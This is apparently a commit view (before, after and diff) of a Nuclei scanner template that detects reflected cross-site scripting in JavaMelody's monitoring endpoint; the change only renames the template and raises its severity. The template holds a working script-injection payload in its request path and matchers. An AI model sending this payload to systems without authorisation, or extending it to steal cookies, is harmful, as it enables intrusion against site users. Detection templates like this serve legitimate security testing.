vulnerabilities/other/java-melody-xss.yaml (before)
id: java-melody-xss

info:
  name: JavaMelody Monitoring - Cross-Site Scripting
  author: kailashbohara
  severity: medium
  description: JavaMelody contains a cross-site scripting vulnerability via the monitoring parameter. An attacker can execute arbitrary script in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/Hurdano/JavaMelody-XSS
    - https://github.com/javamelody/javamelody/pull/555
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,javamelody

requests:
  - method: GET
    path:
      - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/20

vulnerabilities/other/java-melody-xss.yaml (after)
id: java-melody-xss

info:
  name: JavaMelody - Cross-Site Scripting
  author: kailashbohara
  severity: high
  description: JavaMelody contains a cross-site scripting vulnerability via the monitoring parameter. An attacker can execute arbitrary script in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/Hurdano/JavaMelody-XSS
    - https://github.com/javamelody/javamelody/pull/555
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,javamelody

requests:
  - method: GET
    path:
      - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/20

vulnerabilities/other/java-melody-xss.yaml (diff)
@@ -1,9 +1,9 @@
 id: java-melody-xss
 
 info:
-  name: JavaMelody Monitoring - Cross-Site Scripting
+  name: JavaMelody - Cross-Site Scripting
   author: kailashbohara
-  severity: medium
+  severity: high
   description: JavaMelody contains a cross-site scripting vulnerability via the monitoring parameter. An attacker can execute arbitrary script in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://github.com/Hurdano/JavaMelody-XSS
